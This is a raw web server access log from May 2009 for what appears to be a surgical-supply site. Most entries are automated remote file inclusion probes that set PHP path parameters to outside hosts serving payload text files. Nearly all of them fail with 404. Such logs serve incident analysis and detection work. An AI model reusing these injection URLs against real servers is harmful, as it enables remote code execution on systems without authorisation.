12.160.210.100 - - [12/May/2009:02:18:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
74.53.70.114 - - [12/May/2009:02:18:26 -0400] "GET //modules/errors.php?error=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:02:18:26 -0400] "GET /logs//modules/errors.php?error=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:02:18:27 -0400] "GET /logs/access_log.Q109030500%20%20//modules/errors.php?error=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:19:21 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 54803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.126 - - [12/May/2009:02:19:26 -0400] "GET /scripts/browser_opera.js HTTP/1.0" 200 8040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.176.64 - - [12/May/2009:02:19:27 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/ask_password.php?dir=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
89.111.176.64 - - [12/May/2009:02:19:28 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
89.111.176.64 - - [12/May/2009:02:19:28 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
124.217.216.86 - - [12/May/2009:02:21:22 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.217.216.86 - - [12/May/2009:02:21:22 -0400] "GET ///skin/zero_vote/setup.php?dir=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.217.216.86 - - [12/May/2009:02:21:22 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:22:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [12/May/2009:02:23:19 -0400] "GET /logs/access_log.Q108070500////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:23:20 -0400] "GET /logs/access_log.Q108120400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:23:42 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:02:25:12 -0400] "GET /logs/access_log.Q108090500/arcade.php?phpbb_root_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:02:25:12 -0400] "GET /arcade.php?phpbb_root_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:02:25:12 -0400] "GET /logs/arcade.php?phpbb_root_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:02:25:12 -0400] "GET /logs/access_log.Q108082000/arcade.php?phpbb_root_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.140.23.192 - - [12/May/2009:02:25:24 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:25:24 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:25:27 -0400] "GET /logs/access_log.Q109022600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:25:41 -0400] "GET /logs/access_log.Q109022600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:25:41 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:25:41 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
59.109.75.84 - - [12/May/2009:02:26:29 -0400] "GET /logs/access_log.Q109050700%20%20/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:26:42 -0400] "GET /logs/error_log.Q109050600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.138.160.73 - - [12/May/2009:02:27:07 -0400] "GET /logs/access_log.Q109011400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
217.115.136.12 - - [12/May/2009:02:27:11 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.72.114 - - [12/May/2009:02:27:12 -0400] "GET /images/items/index7_david_sutures_over.jpg HTTP/1.1" 200 2567 "-" "Googlebot-Image/1.0"
202.138.160.73 - - [12/May/2009:02:27:20 -0400] "GET /logs/access_log.Q109012800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
218.24.179.193 - - [12/May/2009:02:27:20 -0400] "GET /logs/access_log.Q109012500%20%20/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:27:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [12/May/2009:02:28:06 -0400] "GET /logs/access_log.Q108082000%20/arcade.php?phpbb_root_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:02:28:06 -0400] "GET /logs/access_log.Q108090500%20/arcade.php?phpbb_root_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
62.140.23.192 - - [12/May/2009:02:28:36 -0400] "GET /logs/error_log.Q109050600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.246.85.26 - - [12/May/2009:02:29:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:29:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:29:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:29:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.199.222.19 - - [12/May/2009:02:30:12 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:16 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:16 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:16 -0400] "GET /logs/access_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:18 -0400] "GET /logs/access_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:18 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:18 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:19 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:19 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:28 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:30:29 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:30:29 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:30:29 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:34 -0400] "GET /logs/access_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:34 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:34 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:35 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:35 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:35 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:30:35 -0400] "GET /logs/access_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:35 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:35 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:35 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:37 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:38 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:38 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:41 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:41 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:42 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:43 -0400] "GET /logs/access_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:43 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:43 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:48 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:54 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:55 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:57 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:30:57 -0400] "GET /logs/access_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:00 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:10 -0400] "GET /logs/access_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:02:31:19 -0400] "GET /logs/access_log.Q109050200%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:02:31:19 -0400] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:02:31:19 -0400] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:19 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:31:29 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:31:29 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:31 -0400] "GET /logs/access_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:31:31 -0400] "GET /logs/access_log.Q109050200/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:31:31 -0400] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:31:31 -0400] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:31:33 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:31:34 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:31:34 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:31:34 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:40 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:40 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:31:40 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.21.134.11 - - [12/May/2009:02:31:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L00546B4D71C039008D5C05I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
61.160.201.12 - - [12/May/2009:02:31:54 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:32:06 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.21.134.11 - - [12/May/2009:02:32:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:02:32:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
63.148.24.80 - - [12/May/2009:02:32:15 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.21.134.11 - - [12/May/2009:02:32:16 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):4949201 HTTP/1.1" 200 38016 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
218.150.79.146 - - [12/May/2009:02:32:26 -0400] "GET /logs/access_log.Q108110200/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:32:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.21.134.11 - - [12/May/2009:02:32:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L005ACA409CF01500C56C09V+M37+ENG HTTP/1.1" 200 38034 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):4949201" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
61.160.201.12 - - [12/May/2009:02:32:38 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:32:38 -0400] "GET /logs/access_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:32:39 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
194.1.180.250 - - [12/May/2009:02:32:45 -0400] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://202.118.66.153/claroline/inc/test.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
220.246.85.26 - - [12/May/2009:02:32:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:32:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.30.142.126 - - [12/May/2009:02:32:50 -0400] "GET /logs/access_log.Q107081800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.246.85.26 - - [12/May/2009:02:32:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:32:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
194.1.180.250 - - [12/May/2009:02:32:54 -0400] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://202.118.66.153/claroline/inc/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
193.221.119.126 - - [12/May/2009:02:32:54 -0400] "GET /logs/access_log.Q108110200%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:33:08 -0400] "GET /logs/access_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:33:28 -0400] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:33:28 -0400] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:33:28 -0400] "GET /logs/access_log.Q109050200/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
